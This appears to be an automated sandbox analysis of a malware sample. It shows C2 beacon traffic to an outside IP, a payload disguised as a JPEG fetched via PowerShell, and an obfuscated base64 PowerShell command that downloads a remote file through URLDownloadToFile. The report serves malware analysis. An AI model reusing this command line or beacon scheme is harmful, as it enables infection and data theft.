Nov 15, 2024 18:15:53.681411028 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:54.620743990 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50049	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:54.773739100 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:54.778594017 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:55.777123928 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50054	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:55.936876059 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:55.941776991 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:56.869158030 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50063	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:57.029602051 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:57.034588099 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:58.000564098 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50068	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:58.143311024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:58.148279905 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:59.147363901 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50073	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:59.317055941 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:59.321995974 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:00.269982100 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50080	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:00.427676916 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:16:00.432593107 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:01.382997036 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50084	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:01.544954062 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:16:01.549900055 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:02.497056961 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	142.215.209.78	443	5820	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 17:14:12 UTC	192	OUT	GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 Host: 1017.filemail.com Connection: Keep-Alive
2024-11-15 17:14:12 UTC	324	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT Accept-Ranges: bytes ETag: 4bb5a8185f3b16880e3dcc573015c5d9 X-Transfer-ID: wxhdiueivoluihj Content-Disposition: attachment; filename=new_imagem.jpg Date: Fri, 15 Nov 2024 17:14:11 GMT Connection: close
2024-11-15 17:14:12 UTC	2001	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: eb 41 b6 9e d8 27 92 44 d2 46 c6 49 4d ba 83 4e 18 91 b4 d8 15 d3 00 1d a1 84 84 74 56 6e 4b 05 17 ce 19 e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 Data Ascii: A'DFIMNtVnKHVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: f5 17 8a 82 41 04 1a 3d 88 ca 90 4d 93 77 de f0 35 13 c5 c2 ae d6 8d 89 ff 00 15 f2 30 b1 78 8a bb 02 49 1f 4c c5 cd 0f 0e 89 24 49 77 38 56 e0 2d 8b c0 d6 66 56 60 f2 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 Data Ascii: A=Mw50xIL$Iw8V-fV`lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: ce a4 3f 6a bf d3 03 3d d4 49 37 3d 46 3e 0a 6a 75 29 a7 99 76 ee 5f e1 7a 1e c2 c6 5d 20 d3 b1 33 29 06 36 16 bf c3 8a 68 a1 77 d4 c9 32 80 4a de d0 df df 00 7a b9 65 86 63 a7 40 49 1c 70 01 fe 99 55 81 fc 90 ce 08 37 76 57 fe 99 a3 0e 8a 45 69 24 99 48 95 bd 41 98 70 7e bd 3f 3c 5a 55 74 b4 92 d0 af 63 5d fd b9 c0 ab 7a 94 6d f4 8f e7 94 69 b6 45 d2 c9 f8 03 fc f2 63 06 30 54 8f 97 c7 f5 c9 78 dd 88 52 85 87 c3 01 33 a8 90 ca 3d 2b e9 3d 02 8f ed 9a c2 38 a7 41 b1 00 b1 dd 47 fe 9c 54 69 ae 45 42 a1 79 ef 8f b4 1b 2b cb 46 05 79 e0 5d e0 05 3c 2d e0 f5 6f 56 5e eb 5e f9 44 92 1d 1f 88 6e 2a 0c 6f 6a 6b f8 79 18 e3 6a 1d d7 60 85 81 61 c9 b0 3f 4b cc 49 6d 65 65 2a cc 70 3d 40 93 4e d1 5a ba 70 6e c7 43 98 9e 2f aa 4d 4c c9 1c 64 32 44 39 23 b9 c4 ca 06 Data Ascii: ?j=I7=F>ju)v_z] 3)6hw2Jzec@IpU7vWEi$HAp~?<ZUtc]zmiEc0TxR3=+=8AGTiEBy+Fy]<-oV^^Dnojkyj`a?KImeep=@NZpnC/MLd2D9#
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: 19 20 31 34 3f 2c 66 0d 23 ea 25 11 c6 54 1a 24 96 3e 95 1e e4 f6 c7 64 d4 47 a3 88 e9 f4 84 33 91 52 4f b4 1b f8 2d f6 fd 70 33 e3 9d f4 cc 4c 64 ac 9d 37 0e df 2c a8 90 d1 b2 77 75 bc e0 42 df e1 3d fe 39 24 06 6f 4f 02 ba 7b de 05 d2 66 0c 0b 72 01 04 8b ea 31 90 11 c4 40 33 8d f0 bc 8d 66 fd 40 b5 7f 21 95 83 4b bb 4c fa 89 5b 64 6a a4 21 3c 6f 6a e0 0f ae 0c 6b 26 0a 10 37 a4 73 44 03 c7 26 be 5c e0 4c 88 86 05 7b 70 de 4e ee 7b 9d e5 7f 2a ca 4b 02 a9 d4 15 26 92 60 8a 7d c1 dd fd 86 73 6a 5d ac c8 c4 92 81 45 00 28 58 35 f2 ce 33 bb c6 c8 cd 60 90 c7 8a e8 0f eb ce 03 30 e9 f4 ec f1 19 09 a6 8f 70 4d c1 6d b7 6d ad c4 50 14 09 e7 da b2 f2 69 13 48 1a 60 86 cb 28 8c 12 29 6c 37 27 a8 3c a9 ae 47 4b e9 95 49 87 97 14 8e 53 f7 6b b1 63 da 08 73 64 f2 Data Ascii: 14?,f#%T$>dG3RO-p3Ld7,wuB=9$oO{fr1@3f@!KL[dj!<ojk&7sD&\L{pN{*K&`}sj]E(X53`0pMmmPiH`()l7'<GKISkcsd
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: 8d 12 2b 55 da 18 c6 77 30 ae 97 78 44 fb 4f ae 66 04 e9 b4 b6 a0 05 a4 6e 78 ff 00 7b 33 5d 01 27 8b f8 60 89 e6 80 aa c0 d7 7f b5 3e 22 b6 04 1a 6e 47 45 56 af af ab 00 ff 00 69 f5 93 28 47 48 a2 62 d6 cf 1a b0 35 55 c8 bc cd 2d bb e7 95 91 55 85 1e 78 c0 f5 d3 fd a1 9e 2f 09 d0 ea 91 20 dd 36 ff 00 c4 ad 56 ad 42 bf ae 55 fc 7b 52 9e 11 1e a1 a3 88 4b 34 84 27 a1 a9 90 75 6e bf e2 a1 99 1a d0 17 ec ff 00 83 82 c2 ee 6b 27 a0 1b 86 35 ac d3 b2 f8 57 86 47 33 a4 41 23 69 4c 8e de 90 18 d8 0a 07 24 8e f4 3f 2e b8 14 1f 69 b5 2a 4b 14 89 98 73 65 0f 1f 2e 71 7d 52 cf 28 1a 99 22 8e 1d c4 33 0b 55 66 b3 d4 29 36 7e 63 06 75 29 13 83 a6 89 55 bf fa 67 f5 35 fc 07 45 f7 f7 f8 e0 1c b3 ee 66 25 98 9b 66 63 64 9f 7c 06 f4 de 26 74 da 72 84 29 da 17 66 d4 2d d3 Data Ascii: +Uw0xDOfnx{3]'`>"nGEVi(GHb5U-Ux/ 6VBU{RK4'unk'5WG3A#iL$?.i*Kse.q}R("3Uf)6~cu)Ug5Ef%fcd\|&tr)f-
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: 35 90 40 36 70 07 a7 85 a6 b5 46 21 af a6 6b 42 ba 65 85 43 c2 1d c1 a2 4f 1c f4 cc b8 24 97 47 a9 2a 16 9b f0 90 73 41 a1 4d 52 19 12 32 19 40 f5 06 22 fe 38 17 97 4b a6 d3 96 04 1d d3 50 5f 65 be 99 6d 24 5a 75 8a 30 da 8d cc c6 82 a7 a8 86 3f db 02 9a 39 93 55 a7 25 cc a8 db 5a 99 8d 81 79 ab ca 4f 2e 98 20 da 57 f0 81 c7 42 70 19 8b 44 a9 09 42 4b 7a a8 b1 5a fe 98 be bb 4b 09 85 52 b6 d5 9b f7 ae 72 ba 1d 63 b4 2d 6a 09 dd 42 87 60 2b 1c 31 79 f1 94 90 58 65 a2 0d f7 f9 60 61 47 04 72 c3 71 51 07 bf be 2a fa 6f de 6d 66 ba e7 e5 9a 6f a3 5d 04 33 49 bf 6c 65 c2 aa a1 3c 0e 96 6f 9e b8 03 6d 27 21 41 a0 18 e0 27 e4 08 98 79 6d 64 8b bf 6c 73 4a 5d 9d 90 ab 5a 8f c5 5c 13 93 2a 6d 03 6a 2d 93 5c f7 c3 2a b1 80 29 3b 4b 0e 0a 9b ac 0b a6 f4 60 0f 27 e3 Data Ascii: 5@6pF!kBeCO$GsAMR2@"8KP_em$Zu0?9U%ZyO. WBpDBKzZKRrc-jB`+1yXe`aGrqQomfo]3Ile<om'!A'ymdlsJ]Z\mj-\);K`'
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: d7 5b e9 75 d4 e0 51 d1 92 d9 07 a0 22 b3 73 ee 07 f5 cb e8 d1 8e b6 20 f1 96 56 60 ac b5 da c5 e2 e1 de b6 ee 6a ae 97 db 08 24 71 65 18 a8 fc 44 29 3e fd 7a fc b0 1a 85 11 9e 26 64 2c 0c 2e cc 2c 8f 50 dd 5f c9 70 4f 0a 84 8f d4 15 8c 7b d9 98 1e 4e e2 3f 95 62 fb dd 54 00 ed ef 57 fd 32 a5 d8 9d c4 92 6a b9 c0 3e d4 68 a4 d8 37 10 ca 03 73 c0 a3 78 19 94 2c d2 28 e5 43 1a 3f 0b cb 2c 8c 80 84 6a b3 76 0d 7b e0 89 b0 6f de ef 02 01 a6 07 3d 1f d9 f9 f5 12 b4 e0 ca ec aa 14 00 cc 49 17 7d 39 f8 67 9d 03 9e 97 f0 cd bf b3 c5 c0 d4 ec 04 9f 49 e3 b7 e2 c0 d0 1a 86 8f c4 84 6d 24 a1 89 e0 5f 6c 67 52 ee cc 88 19 88 0e 7f 17 cb 38 bc 51 cc 1e 50 04 8f c5 d5 9a cb 6b 59 96 25 71 1b 1f 50 51 4b 81 83 3f 86 6a 67 f1 11 19 3b 95 89 20 fc 07 5c df d2 14 d0 e9 c4 Data Ascii: [uQ"s V`j$qeD)>z&d,.,P_pO{N?bTW2j>h7sx,(C?,jv{o=I}9gIm$_lgR8QPkY%qPQK?jg; \
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: db f8 72 8f ab 49 0c ca 5c 95 3a 68 a3 4b 06 89 1b 09 1f a3 1c 4a 45 65 0a 59 40 2c 2e 83 0f ef 95 da ce aa e1 45 92 c3 93 ec 01 fe b8 1b 53 4a 34 c4 cb 21 95 43 6b 16 60 8c a5 6b f1 13 c3 75 3c 8b af 71 80 3a 88 d3 6a 46 f0 84 09 33 7e ed 5a ad 93 68 bd dc dd 8c cc 58 26 76 0c b1 d8 65 df f8 b8 db 7b 6c fc 2f 2e 51 c2 3d 83 e6 29 55 db 57 60 82 41 bc 0d 09 f5 50 9d 2b 84 31 ab 34 4b 1b d2 b1 63 b4 2d ee 37 b6 bd 3d 86 24 4a ac 6e a1 9c 7a 95 94 37 42 00 23 91 ef ce 2e 1e ec d0 15 c1 f9 e4 02 d3 38 45 04 b3 10 05 7b e0 3c 5a 09 b4 fa 7d fa 88 d0 c5 19 57 42 ad b8 9d cc dc 50 ae fe f8 64 f1 08 9b 54 da 96 11 6e 5d 43 4c 37 86 be 4a 90 06 d2 01 3e 9e e4 66 72 c1 3b 48 a8 a0 33 35 d2 86 06 c8 e4 83 f1 ca 88 24 16 c1 54 d7 45 2c 2c f6 34 2e ce 03 d3 f9 6b a5 Data Ascii: rI\:hKJEeY@,.ESJ4!Ck`ku<q:jF3~ZhX&ve{l/.Q=)UW`AP+14Kc-7=$Jnz7B#.8E{<Z}WBPdTn]CL7J>fr;H35$TE,,4.k
2024-11-15 17:14:12 UTC	8192	IN	Data Raw: ea f7 c4 63 8d 91 61 90 0b 3b d8 57 fc 2b 8c ce f2 30 0b 1f 04 8c 0a 13 64 ee 16 33 8c 4a ca 59 78 38 36 49 43 80 09 62 47 35 8e 40 ac ab 4d 5f 1c 0f 3d a8 8e fc 63 a5 f0 b6 7d ba 62 fe 20 a5 dd 12 c3 05 04 0a f6 e3 34 75 30 b0 f1 26 65 23 d5 b7 9b ed 43 03 3e 9c a0 42 54 7a 83 72 3b d8 c0 5a 5d 38 ff 00 66 c6 6c 9a a0 c0 0e 3a 8c 5f 4b a3 47 9a 47 dc 54 46 6d 68 f2 73 4a 99 74 2d 43 b0 02 c7 eb 89 2c 54 49 22 fe 5c 60 2d ae 8d 5a 65 20 35 6d aa 3d 7a 9c d2 96 05 9a 17 55 6d c4 02 68 8b e7 da b1 59 93 7b 86 f5 6d ac 70 90 15 c8 52 24 22 94 a9 ed 56 3f 5c 0c 79 50 6e 05 15 59 56 b9 0b 42 f9 24 65 5c b1 66 05 55 43 30 6b 0a 0e 3a f1 5b 72 85 58 fe 2a e8 70 26 23 7e f8 01 48 12 52 06 fd ac cd 4c 58 71 5f 0c 98 a0 f2 9f 74 a8 4c 4d 6b be aa be 38 54 88 a9 f6 Data Ascii: ca;W+0d3JYx86ICbG5@M_=c}b 4u0&e#C>BTzr;Z]8fl:_KGGTFmhsJt-C,TI"\`-Ze 5m=zUmhY{mpR$"V?\yPnYVB$e\fUC0k:[rX*p&#~HRLXq_tLMk8T

Target ID:	0
Start time:	12:13:59
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta"
Imagebase:	0x4b0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:13:59
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJh